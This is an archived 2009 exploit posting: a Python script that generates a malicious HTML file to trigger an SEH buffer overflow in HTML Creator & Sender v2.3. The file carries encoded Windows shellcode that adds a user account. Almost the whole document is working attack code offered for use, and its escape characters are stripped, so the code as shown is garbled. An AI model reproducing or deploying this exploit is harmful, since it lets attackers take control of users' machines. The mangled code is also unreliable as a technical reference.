htmlcreatorsender-overflow.txt
Posted on 28 August 2009
#!/usr/bin/env python ############################################################################# # # HTML Creator & Sender <= v2.3 Build 697 Local Buffer Overflow Exploit (SEH) # Coded By: Dr_IDE # Based On: http://www.milw0rm.com/exploits/9446 # Testd On: Windows XP SP2 # Download: http://www.html-email.net/ # Usage: Browse to file, enter anything for From and To, Send Email. # ############################################################################# import struct # windows/adduser USER=Dr_IDE PASS=Dr_IDE # x86/alpha_upper succeeded with size 475 (iteration=1) # badchars = "x00x0ax0dx20xff" at least, Bind Shell was # not working for me, there are still some unidentified bad chars. sc = ( "x89xe1xdbxdfxd9x71xf4x59x49x49x49x49x49x43x43" "x43x43x43x43x51x5ax56x54x58x33x30x56x58x34x41" "x50x30x41x33x48x48x30x41x30x30x41x42x41x41x42" "x54x41x41x51x32x41x42x32x42x42x30x42x42x58x50" "x38x41x43x4ax4ax49x4bx4cx4bx58x51x54x43x30x43" "x30x43x30x4cx4bx51x55x47x4cx4cx4bx43x4cx45x55" "x42x58x43x31x4ax4fx4cx4bx50x4fx45x48x4cx4bx51" "x4fx51x30x45x51x4ax4bx50x49x4cx4bx46x54x4cx4b" "x45x51x4ax4ex46x51x49x50x4cx59x4ex4cx4cx44x49" "x50x42x54x44x47x49x51x49x5ax44x4dx45x51x49x52" "x4ax4bx4ax54x47x4bx50x54x46x44x44x44x44x35x4d" "x35x4cx4bx51x4fx47x54x45x51x4ax4bx43x56x4cx4b" "x44x4cx50x4bx4cx4bx51x4fx45x4cx45x51x4ax4bx4c" "x4bx45x4cx4cx4bx43x31x4ax4bx4bx39x51x4cx51x34" "x44x44x49x53x51x4fx46x51x4cx36x43x50x51x46x42" "x44x4cx4bx50x46x50x30x4cx4bx47x30x44x4cx4cx4b" "x44x30x45x4cx4ex4dx4cx4bx45x38x45x58x4cx49x4a" "x58x4dx53x49x50x43x5ax50x50x43x58x4ax50x4dx5a" "x43x34x51x4fx45x38x4dx48x4bx4ex4cx4ax44x4ex51" "x47x4bx4fx4dx37x42x43x42x4dx43x54x46x4ex42x45" "x43x48x43x55x47x50x46x4fx43x53x47x50x42x4ex43" "x55x44x34x47x50x43x45x42x53x43x55x44x32x47x50" "x50x44x42x52x51x4fx50x49x50x44x47x35x47x50x51" "x54x44x32x51x4fx51x59x51x54x47x35x51x30x46x4f" "x47x31x47x34x51x54x47x50x46x46x51x36x51x30x42" "x4ex45x35x43x44x47x50x42x4cx42x4fx45x33x45x31" "x42x4cx45x37x44x32x42x4fx43x45x44x30x51x30x51" "x51x43x54x42x4dx43x59x42x4ex45x39x44x33x43x44" "x43x42x45x31x43x44x42x4fx42x52x44x33x47x50x50" "x44x44x32x51x4fx47x39x47x34x47x35x47x50x46x4f" "x47x31x50x44x47x34x43x30x45x5ax41x41") jump = ("xEBx06x90x90") junk = ("x43" * (4616 - len(sc))) retn = ("xFAx89xABx71") #WS2_32.DLL XPSP2 nops = ("x90" * 8) # Don't mess with the headers, we need to create a valid HTML file header1 = ("<HTML> <HEAD> </HEAD> <BODY> <img src = "") payload = ("x41" * 56 + jump + retn + nops + sc + junk) header2 = (""> </BODY> </HTML> ") try: f1 = open("Dr_IDE-Evil.html","w") f1.write(header1 + payload + header2) f1.close() print(" Exploit file created! ") except: print ("Error")
